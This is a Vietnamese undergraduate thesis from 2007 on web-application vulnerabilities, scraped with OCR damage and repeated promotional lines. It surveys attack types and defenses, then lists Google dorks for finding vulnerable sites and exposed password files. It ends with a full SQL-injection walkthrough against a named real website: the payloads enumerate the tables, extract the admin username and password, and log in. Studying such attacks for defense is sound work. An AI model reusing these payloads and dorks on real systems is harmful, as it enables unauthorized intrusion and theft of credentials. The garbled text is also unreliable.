Nghiên cứu bảo đảm an toàn thông tin bằng kiểm soát lỗ hổng trong dịch vụ web

73 1 0
Nghiên cứu bảo đảm an toàn thông tin bằng kiểm soát lỗ hổng trong dịch vụ web

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

Thông tin tài liệu

BỘ GIÁO DỤC VÀ ĐÀO TẠO TRƯỜNG ĐẠI HỌC DÂN LẬP HẢI PHÒNG -oo0oo - NGHIÊN CỨU BẢO ĐẢM AN TỒN THƠNG TIN BẰNG KIẾM SỐT “LỖ HỔNG” TRONG DỊCH VỤ WEB ĐỒ ÁN TỐT NGHIỆP ĐẠI HỌC HỆ CHÍNH QUY Nghành: Cơng Nghệ Thơng Tin HẢI PHÒNG-2007 MỤC LỤC Bảng giải từ viết tắt……………………………………………………… Lời mở đầu…………………………………………………………………… LUAN VAN CHAT LUONG download : add luanvanchat@agmail.com Chương 1: KHÁI NIỆM CƠ SỞ…………………………………………… 1.1 KHÁI NIỆM VỀ BẢO VỆ WEB …………………………………… 1.2 ỨNG DỤNG WEB…………………………………………………….12 1.2.1 Khái niệm ứng dụng web………………………………………… …12 1.2.2 Hoạt động ứng dụng web………………………………………….13 1.3 MỘT SỐ CÔNG CỤ BẢO VỆ WEB.……………………………… 15 Tường lửa…………………………………………………………… 15 Mạng riêng ảo ……………………………………………………….17 Chương 2: CÁC KỸ THUẬT TẤN CÔNG LỢI DỤNG LỖ HỔNG……… 18 2.1 CHÈN THAM SỐ…………………………………………………… 18 2.1.1 Chỉnh sửa HTTP Header………………………………………………18 2.1.2 Chỉnh sửa địa URL……………………………………………… 21 2.1.3 Chỉnh sửa trường ẩn Form…………………………………………… 22 2.1.4 Thao tác cookie……………………………………………… …24 2.2 CHÈN Mà LỆNH TRÊN TRÌNH DUYỆT …………….…………….27 2.2.1 Phương pháp cơng XSS……………………………………………27 2.2.2 Biện pháp phòng tránh…………………………………………… …31 2.3 CHÈN CÂU LỆNH TRUY VẤN ………………………………… 32 2.3.1 Tấn công vượt qua kiểm tra đăng nhập…………………………… 32 2.3.2 Tấn công dựa vào câu lệnh SELECT……………………………… 34 2.3.3 Tấn công dựa vào câu lệnh INSERT………………………………… 36 2.3.4 Tấn công dựa vào Store-Procedure………………………………… 37 2.3.5 Biện pháp phịng tránh………………………………………… ……38 2.4 2.4.1 2.4.2 2.4.3 TẤN CƠNG DỰA VÀO “KIỂU QUẢN LÝ PHIÊN LÀM VIỆC… 40 Tấn công kiểu “ấn định phiên làm việc”…………………………… 41 Tấn công kiểu “đánh cắp phiên làm việc”…………………………….45 Biện pháp phòng tránh……………………………………………… 46 2.5 TẤN CÔNG “TỪ CHỐI DỊCH VỤ”………………………………….47 2.5.1 Khái niệm DoS……………………………………………………… 47 a/ Lợi dụng TCP thưc Synflood………………………………….49 LUAN VAN CHAT LUONG download : add luanvanchat@agmail.com b/ Tấn công vào băng thông………………………………………… 50 c/ DdoS……………………………………………………………… 52 2.5.2 Biện pháp phịng tránh…………………………………………………53 2.6 NGƠN NGỮ PHÍA TRÌNH CHỦ…………………………………… 54 2.7 TẤN CÔNG “TRÀN BỘ ĐỆM”………………………………………56 Chương 3: TỔNG KẾT KỸ THUẬT TẤN CÔNG CỦA HACKER……… 58 3.1 THU THẬP THÔNG TIN Ở MỨC HẠ TẦNG CỦA MỤC TIÊU… 58 3.2 KHẢO SÁT ỨNG DỤNG WEB………………………………………61 Ví dụ thử nghiệm…………………………………………………………… 63 Bảng giải từ viết tắt LUAN VAN CHAT LUONG download : add luanvanchat@agmail.com DNS ACK CSDL SYN TTL FIN HTTP SSL HTTPS Hacker CGI IP TCP SSI URI URL CSV dbo Sa IIS OWASP HTML IIS Domain Name System Acknowlegment Synchronize Time TO Live Fully Intergrated Netword Hyper Text Transfer protocol Secure Socket Layer HTTP + SSL Common Gateway Interface Internet Protocol Transfer Control Protocol Server Side Include Uniform Resour Identifies Uniform Resour Locator Client Side Validator Data base owner System Administrator Internet Information Server The open web Appllication standard project Hyper Text Markup Language Internet Infomation Server Hệ thống tên miền Xác nhận Cơ sở liệu Đồng Thời gian tồn Mạng tích hợp đầy đủ Giao thức truyền siêu văn Khe cắm an tồn Tin tặc Giao diện cổng thơng thường Giao thức mạng Giao thức điều khiển truyền thông Ngôn ngữ phía trình chủ Con trỏ đến tài ngun web Định vị tài ngun web Kiểm tra ngơn ngữ phía trình duyệt Người sở hữu sở liệu Người quản trị hệ thống Dịch vụ thông tin mạng Dự án ứng dụng web Ngôn ngữ đánh dấu siêu văn LỜI MỞ ĐẦU Ngày nay, Internet phổ biến rộng rãi, tổ chức, cá nhân có LUAN VAN CHAT LUONG download : add luanvanchat@agmail.com nhu cầu giới thiệu thơng tin xa lộ thông tin thực phiên giao dịch trực tuyến Vấn đề nảy sinh phạm vi ứng dụng ứng dụng Web ngày mở rộng khả xuất lỗi (lỗ hổng) bị công cao, trở thành đối tượng cho nhiều người cơng với mục đích khác Đôi khi, đơn giản để thử tài đùa bỡn với người khác Cùng với phát triển không ngừng Internet dịch vụ đó, số lượng vụ cơng Internet tăng theo cấp số nhân Trong phương tiện thông tin đại chúng ngày nhắc nhiều đến khả truy nhập thơng tin Internet, tài liệu chuyên môn bắt đầu đề cập nhiều đến vấn đề bảo đảm an toàn liệu cho máy tính kết nối vào mạng Internet Theo số liệu CERT (Computer Emegency Response Team "Đội cấp cứu máy tính"): “số lượng vụ cơng Internet thơng báo cho tổ chức 200 vào năm 1989, khoảng 400 vào năm 1991, 1400 vào năm 1993, 2241 vào năm 1994, năm 2001 5315 vụ.” Nguyên nhân chủ yếu làm cho vụ cơng tăng nhanh có nhiều “lỗ hổng” tìm thấy ứng dụng web Theo thống kê Symantec “năm 2004 có 49% số lượng lỗ hổng tìm thấy ứng dụng web Từ tháng đến tháng 11 năm 2006, xác định lỗ hổng bảo mật nằm ứng dụng web chiếm tới 75%, tăng 15% so với đầu năm” Những vụ công nhằm vào tất máy tính có mặt Internet, máy tính công ty lớn AT&T, IBM, trường đại học, quan LUAN VAN CHAT LUONG download : add luanvanchat@agmail.com nhà nước, tổ chức quân sự, nhà băng Một số vụ cơng có quy mơ khổng lồ (có tới 100.000 máy tính bị cơng) Hơn nữa, số phần tảng băng Một phần lớn vụ cơng khơng thơng báo, nhiều lý như: nỗi lo bị uy tín, đơn giản người quản trị hệ thống không hay biết công nhằm vào hệ thống họ (Một ví dụ điển hình cơng vào phần mềm thương mại IBM tháng 3/2001, hai hacker tìm thấy lỗ hổng ứng dụng mà với trình duyệt Web lấy tài khoản người dùng, chí người quản trị) Không số lượng công tăng lên nhanh chóng, mà phương pháp cơng ngày tinh vi có tổ chức Mặt khác, việc quản trị hệ thống mạng đòi hỏi nhà quản trị hệ thống có kiến thức kinh nghiệm hệ thống mạng chắn, yếu quản lý tạo nhiều điều kiện cho hacker khai thác Cũng theo CERT, công thời kỳ 1988-1989 chủ yếu đoán “tên người sử dụng/mật khẩu” (UserID/password) sử dụng lỗi chương trình hệ điều hành (security hole) làm vơ hiệu hệ thống bảo vệ, nhiên công vào thời gian gần bao gồm thao tác giả mạo địa IP, theo dõi thông tin truyền qua mạng, chiếm phiên làm việc từ xa (telnet rlogin), cài trojan hay worm để kiểm sốt hay điều khiển máy tính…vì thế, nhu cầu bảo vệ thông tin Internet cần thiết nhằm mục đích bảo vệ liệu, bảo vệ thơng tin người dùng bảo vệ hệ thống Khi nói đến vấn đề bảo mật, hầu hết chuyên gia bảo mật trọng đến an toàn hệ thống mạng hệ điều hành Để bảo vệ hệ thống, phương pháp thường chọn sử dụng firewall Tuy nhiên, theo tuyên bố LUAN VAN CHAT LUONG download : add luanvanchat@agmail.com CSI/FBI : 78% nơi bị hại có sử dụng firewall 59% bị công thông qua Internet, cụ thể theo báo cáo CSI/FBI Computer Crime Security Survey tổng số thiệt hại ứng dụng Web bị công từ năm 1997 đến năm 2006 800 triệu đơla Mỹ Với cơng cụ tự động tìm lỗ hổng giúp nhiều cho nhà lập trình Web khơng thể ngăn chặn tồn cơng nghệ Web phát triển nhanh chóng (chủ yếu trọng đến yếu tố thẩm mĩ, yếu tố tốc độ…) nên dẫn đến nhiều khuyết điểm phát sinh Sự công không nằm khuôn khổ vài kĩ thuật phát hiện, mà linh động tăng lên tùy vào sai sót nhà quản trị hệ thống người lập trình ứng dụng Chương 1: KHÁI NIỆM CƠ SỞ 1.1 KHÁI NIỆM VỀ BẢO VỆ WEB LUAN VAN CHAT LUONG download : add luanvanchat@agmail.com Bảo vệ web khơng cịn khái niệm xa lạ người lập trình web, nhà quản trị mạng,… Mục tiêu bảo vệ web gồm có: Bảo mật: Thơng tin khơng đọc trái phép Bảo tồn: Thơng tin khơng bị sửa đổi cách trái phép Bảo đảm tính sẵn sàng: Người dùng hợp pháp có quyền truy cập hay sử dụng thơng tin Hai đối tượng sử dụng dịch vụ web người dùng người quản trị hệ thống Phía người dùng dịch vụ web, an tồn mạng trước hết yêu cầu đặt với server Thứ nhất, yêu cầu gửi đến server phải thưc thi phản hồi thời gian định (tính sẵn sàng) Thứ hai, thông tin gửi tới phải đảm bảo không bị virut hay bị sửa đổi tác nhân khác (tính tồn vẹn) Thứ ba, server khơng phổ biến thơng tin cá nhân mạng (tính bí mật) Phía nhà quản trị hệ thống, họ có yêu cầu giống với người dùng nhìn góc độ khác Thứ nhất, họ phải đảm bảo người dùng xâm nhập vào server để thay đổi nội dung website (tính tồn vẹn) Thứ hai, người dùng truy cập vào thơng tin khơng thuộc quyền họ (tính bí mật bắt buộc) Thứ ba, người dùng cơng server làm khơng thể phục vụ người dùng khác (tính sẵn sàng) Thứ tư, người dùng nhận dạng phải chịu trách nhiệm chối bỏ hành động (tính xác thực) ™ Đối tượng công mạng (Intruder): LUAN VAN CHAT LUONG download : add luanvanchat@agmail.com cá nhân tổ chức sử dụng công cụ phá hoại phần mềm phần cứng để dị tìm điểm yếu, lỗ hổng bảo mật hệ thống, thực hoạt động xâm nhập chiếm đoạt tài nguyên mạng trái phép Một số đối tượng công mạng: Tin tặc (Hacker): kẻ xâm nhập mạng trái phép cách sử dụng công cụ phá mật khai thác điểm yếu thành phần truy nhập hệ thống Kẻ giả mạo (Masquerader): kẻ giả mạo thơng tin mạng Một số hình thức giả mạo giả mạo địa IP, tên miền, định danh người dùng… Kẻ nghe trộm (Evesdropping): đối tượng nghe trộm thông tin mạng sử dụng công cụ sniffer, sau dùng cơng cụ phân tích debug để lấy thơng tin có giá trị Mục đích: ăn cắp thơng tin có giá trị kinh tế, phá hoại hệ thống mạng có chủ định vó thể hành động vơ ý thức nhằm thử nghiệm chương trình khơng kiểm tra cẩn thận,… ™ Lỗ hổng bảo mật: yếu hệ thống ẩn chứa dịch vụ đó, mà dựa vào kẻ cơng xâm nhập trái phép để thực hành động phá hoại chiếm đoạt tài nguyên bất hợp pháp Nguyên nhân gây lỗ hổng bảo mật khác nhau: lỗi thân hệ thống, phần mềm cung cấp, người quản trị yếu không hiểu sâu sắc dịch vụ cung cấp,… Mức độ ảnh hưởng lỗ hổng khác nhau: có lỗ hổng ảnh hưởng tới chất lượng dịch vụ, có lỗ hổng ảnh hưởng sâu sắc tới tồn hệ thống,… ™ Một số hình thức công mạng LUAN VAN CHAT LUONG download : add luanvanchat@agmail.com Dựa vào lỗ hổng bảo mật mạng: lỗ hổng thường điểm yếu dịch vụ mà hệ thống cung cấp Sử dụng cơng cụ để phá hoại: ví dụ chương trình phá khóa mật để truy cập bất hợp pháp vào chương trình Kẻ cơng kết hợp hai hình thức để đạt mục đích Tùy thuộc vào cách công mà mức nguy hại tới hệ thống khác Các mức công hệ thống: Mức 1: Tấn công vào số dịch vụ mạng: web, email,… dẫn đến Nguy lộ thông tin cấu hình mạng Mức 2: Kẻ phá hoại dùng tài khoản người dùng hợp pháp để chiếm đoạt tài nguyên hệ thống Kẻ phá hoại thay đổi quyền truy nhập qua lỗ hổng bảo mật đọc thông tin tập tin liên quan đến truy nhập hệ thống như: /etc/passwd (Linux) SAM file (windows) Mức 3,4,5: Kẻ phá hoại không sử dụng quyền người dung thơng thường, mà có thêm quyền cao với hệ thống quyền kích hoạt số dịch vụ, xem thông tin khác hệ thống Mức 6: Kẻ công chiếm quyền root admin hệ thống ™ Các mức bảo vệ an toàn mạng 10 LUAN VAN CHAT LUONG download : add luanvanchat@agmail.com Cách gây tràn đệm qua ứng dụng web Các bước kỹ thuật tràn đệm là: chuẩn bị đệm dùng để làm tràn, xác định địa trả về, xác định địa đệm chứa shellcode, cuối gọi thực thi chương trình bị tràn đệm Thơng qua nhập liệu hacker sử dụng chuỗi string nhị phân có khả thực thi đoạn lệnh máy đích phá vỡ hệ thống phải xử lí liệu dài, vượt khả cho phép hệ thống Biện pháp phòng chống: Người thiết kế Web cần phải kiểm tra kĩ kích thước liệu trước dùng Dùng Referer HTTP Header để kiểm tra yêu cầu có phải xuất phát từ máy người dùng Xem xét tính bảo mật mã nguồn phần mềm mở Sử dụng vùng nhớ cấp phát động Cẩn thận sử dụng vòng lặp để chép liệu từ biến, cần đảm bảo giới hạn kiểm tra Cài đặt sửa lỗi Sử dụng công cụ hướng dẫn để đánh giá mức độ an tồn chương trình, Slint, rát, flawfinder 59 LUAN VAN CHAT LUONG download : add luanvanchat@agmail.com Chương 3: TỔNG KẾT Q TRÌNH TẤN CƠNG CỦA HACKER 3.1.THU THẬP THÔNG TIN Ở MỨC HẠ TẦNG CỦA MỤC TIÊU Bước 1: FootPrinting (Thu thập thông tin): Cách hacker làm muốn lấy lượng thông tin tối đa máy chủ, doanh nghiệp, người dùng; bao gồm chi tiết địa IP, Whois, DNS - thông tin thức có liên quan đến mục tiêu Cơng cụ hỗ trợ: UseNet, search engines (cơng cụ tìm kiếm), Edgar Any Unix client, nslookup Is -d , Sam spade, … Bước 2: Scanning (Qt thăm dị): Phần lớn thơng tin quan trọng từ server có từ bước , bao gồm quét cổng, xác định hệ điều hành, v.v để biết port server, nghe đường liệu Các công cụ: fping, icmpenum Ws_ping ProPack, nmap, SuperScan, fscan nmap, queso, siphon Bước 3: Enumeration (Liệt kê tìm lỗ hổng): Tìm kiếm tài nguyên bảo vệ kém, tài khoản người dùng sử dụng để xâm nhập, bao gồm mật mặc định, script dịch vụ mặc định Rất nhiều người quản trị mạng đến không sửa đổi lại giá trị Các công cụ phụ trợ: null sessions, DumpACL, sid2user, OnSite Admin showmount, NAT Legion banner grabbing với telnet, netcat, rpcinfo 60 LUAN VAN CHAT LUONG download : add luanvanchat@agmail.com Bước 4: Gaining access (Tìm cách xâm nhập): Bây hacker tìm cách truy cập vào mạng, thơng tin có ba bước Phương pháp sử dụng là: công vào lỗi tràn đệm, lấy giải mã file password, hay brute force (kiểm tra tất trường hợp) password Các công cụ: tcpdump, L0phtcrack readsmb, NAT, legion, tftp, pwdump2 (NT) ttdb, bind, IIS, HTR/ISM.DLL Bước 5: Escalating privilege (Leo thang đặc quyền): Trong trường hợp hacker xâm nhập đựợc vào mạng với tài khoản đó, họ tìm cách kiểm sốt tồn hệ thống Hacker tìm cách lấy mật người quản trị, sử dụng lỗ hổng để leo thang đặc quyền Công cụ: L0phtcrack, Ic_messages, getadmin, sechole Bước 6: Pilfering (Dùng file chứa pass bị sơ hở): Các máy tìm kiếm đựơc sử dụng để tìm phương pháp truy cập vào mạng Những file text chứa password hay chế khơng an tồn khác đích cho hacker Thơng tin lấy từ bước đủ để ta định vị server điều khiển server Công cụ hỗ trợ: rhost, LSA Secrets user data, configuration files, Registry Bước 7: Covering Tracks (Xoá dấu vết) : Sau có thơng tin cần thiết, hacker tìm cách xoá dấu vết, xoá file log hệ điều hành làm cho người quản lý không nhận hệ thống bị xâm nhập, có biết khơng tìm kẻ xâm nhập Xóa log Cơng cụ: Zap, Event log GUI, rootkits, file streaming 61 LUAN VAN CHAT LUONG download : add luanvanchat@agmail.com Bước 8: Creating Backdoors (Tạo cửa sau chuẩn bị cho lần xâm nhập dễ dàng hơn): Hacker để lại "Back Doors", tức chế cho phép hacker truy nhập trở lại đường bí mật, khơng phải tốn nhiều công sức, việc cài đặt Trojan hay tạo user (đối với tổ chức có nhiều user) Công cụ: loại Trojan, keylog, creat rogue user accounts, schedule batch jobs, infect startup files, plant remote control services, install monitoring mechanisms, replace apps with Trojan 62 LUAN VAN CHAT LUONG download : add luanvanchat@agmail.com 3.2.KHẢO SÁT ỨNG DỤNG WEB Phương pháp khảo sát phổ biến, Xem mã nguồn lợi dụng lỗi cho phép xem mã nguồn.để tìm phương thức cơng phù hợp Một số ngơn ngữ web thơng dụng có nhiều lỗi Active Server Pages (ASP), Common Gateway Interface (CGI), ColdFusion Server (CFM), Hypertext Preprocessor (PHP) Tìm site bị lỗi cách dùng www.google.com, search từ khóa liên quan Sử dụng allinurl: trước đoạn string đặc biệt cần kiếm, trang Web tìm kiếm chắn có chuỗi cần tìm Ví dụ: "allinurl:/advadmin" (khơng có ngoặc kép) liệt kê trang có URL có dạng : http://tentrangweb.com/advadmin Tìm file http://www.google.com thêm chữ type file: trước tên file cần tìm chun khu web Ví dụ: + Muốn tìm file mdb (đây file chứa mật trang Web, dùng Access để mở) vào http://www.google.com đánh type file:mdb + Tìm file SAM (đây file chứa Password Windows NT, dùng L0phtCrack để Crack) vào http://www.google.com đánh type file:SAM + Tấn cơng vượt qua chế kiểm sốt (authentication, authorization) Bao gồm phương pháp đoán mật khẩu, thay đổi thông tin cookies, kĩ thuật directory traversal, leo thang đặc quyền, phương pháp công dựa vào SQL, SQL injection 63 LUAN VAN CHAT LUONG download : add luanvanchat@agmail.com + Tìm hiểu sâu chức ứng dụng web Tìm hiểu cách thực phần ứng dụng, đặc biệt order input, confirmation, order tracking Ở ta áp dụng phương pháp SQL Injection, input validation + Tìm hiểu luồng di chuyển thơng tin Các thông tin tương tác client server, thông tin tương tác với database Hiện việc viết mã để thực việc giao tiếp thông tin thường phải đảm bảo tính hiệu (nhanh), bảo mật (có thể chậm hơn) Thường tính hiệu ưu tiên phát sinh lỗi q trình giúp hacker lợi dụng lỗi SQL input để đoạt quyền điều khiển hệ thống + Tấn công Khi thu thập khảo sát kỹ đối tượng, hacker bắt đầu thực công nhằm xâm nhập vào hệ thống lấy thông tin, đưa thông tin xấu vào, dành quyền kiểm sốt,… Cịn khơng thành cơng việc xâm nhập, Dos cách thức cuối mà hacker thường lựa chọn để làm cho hệ thống hoạt đông 64 LUAN VAN CHAT LUONG download : add luanvanchat@agmail.com Ví dụ kiểu cơng SQL Injection câu lệnh SELECT nhằm lấy tên đăng nhập mật admin (bằng cách thêm câu lệnh truy vấn URL): (Thử nghiệm công vào trang http://www.ectb.org) - Tìm trang web có khả bị lỗI SQL Injection: sử dụng từ khóa “allinurl”: allinurl:"shopdisplayproducts.asp?code= (Có thể “id=” “cat=”) - Xem trang web có lỗi cách thêm dấu nháy đơn (‘) vào sau giá trị 65 LUAN VAN CHAT LUONG download : add luanvanchat@agmail.com “code=”: http://www.ectb.org/ectb/tabs/leagues/league_listing.asp?code=DL' - Trang web có lỗi xuất thông báo dấu nháy gây ra: 66 LUAN VAN CHAT LUONG download : add luanvanchat@agmail.com Bây ta khai thác lỗi cách thêm câu lệnh SQL vào sau dấu nháy: - Mục tiêu thứ lấy bảng CSDL: %20and 1=convert(int,(select top table_name from information_schema.tables)) sp_password information_schema.tables: chứa tất bảng DL - Lấy bảng lại CSDL: sử dụng câu lệnh “not in” vớI bảng %20and 1=convert(int,(select top table_name from information_schema.tables where table_name not in ('LeagueMaster2'))) sp_password - Khi lấy hết bảng CSDL: 67 LUAN VAN CHAT LUONG download : add luanvanchat@agmail.com %20and%201=convert(int,(select%20top%201%20table_name%20from%20inf ormation_schema.tables%20where%20table_name%20not%20in%20 ('LeagueMaster2','LeaguePoints','TournamentPermissions','ActContacts', 'AdminAccess','AdminAccessGroups','AdminUsers','AdminUsersAccess', 'AdminUsersLogins'))) sp_password Ta thông báo: - Tiếp theo, ta lấy trường nằm bảng, xem bảng 68 LUAN VAN CHAT LUONG download : add luanvanchat@agmail.com chứa thông tin admin (Ở bảng cần tìm “Adminusers”) %20and 1=convert(int,(select top column_name from information_schema.columns where table_name=('Adminusers')))-sp password information_schema.columns: chứa thông tin tất cột bảng - Ta dùng lệnh “not in” để lấy cột bảng: 69 LUAN VAN CHAT LUONG download : add luanvanchat@agmail.com %20and 1=convert(int,(select top column_name from information_schema.columns where table_name=('AdminUsers') and column_name not in ('userID'))) sp_password Các cột tiếp theo: %20and%201=convert(int,(select%20top%201%20column_name%20fr om%20information_schema.columns%20where%20table_name= ('AdminUsers')%20and%20column_name%20not%20in%20('userID', 'displayName','login','password'))) sp_password - Tìm tên đăng nhập mật khẩu: 70 LUAN VAN CHAT LUONG download : add luanvanchat@agmail.com '%20and%201=convert(int,(select%20top%201%20login%2b'/'%2bpassword %20from%20AdminUsers)) sp_password - Đến địa admin thực hiên đăng nhập: - Đăng nhập thành công: 71 LUAN VAN CHAT LUONG download : add luanvanchat@agmail.com - Click vào kiện “Submit Event” Kết nhận trang dùng để thêm thông tin vào sở liệu 72 LUAN VAN CHAT LUONG download : add luanvanchat@agmail.com Tài liệu tham khảo [1] ASP 3.0- Nguyễn Phương Loan, NXB Lao Động-Xã Hội [2] Hacking Exposed- Stuart McClure, Joel Scambray, George Ku Các website: [5] http://online.securityfocus.com/archive [6] www.hvaonline.net [7] http://www.networksolutions.com/whois [8] www.vnexpress.com [9] www.quantri mang.com [10] www.cert.org [11] www.owasp.org 73 LUAN VAN CHAT LUONG download : add luanvanchat@agmail.com ... BẢO VỆ WEB LUAN VAN CHAT LUONG download : add luanvanchat@agmail.com Bảo vệ web khơng cịn khái niệm xa lạ người lập trình web, nhà quản trị mạng,… Mục tiêu bảo vệ web gồm có: Bảo mật: Thơng tin. .. chất lượng dịch vụ, có lỗ hổng ảnh hưởng sâu sắc tới tồn hệ thống,… ™ Một số hình thức cơng mạng LUAN VAN CHAT LUONG download : add luanvanchat@agmail.com Dựa vào lỗ hổng bảo mật mạng: lỗ hổng thường... dụng web phân tích- thiết kế- lập trình- kiểm thử Ở bước này, vấn đề bảo mật thông thường quan tâm giai đoạn cuối Ở giai đoạn phát lỗ hổng bảo mật vá lỗi khơng giải triệt để lỗi + Lỗi nằm dịch vụ

Ngày đăng: 01/11/2022, 16:05

Tài liệu cùng người dùng

Tài liệu liên quan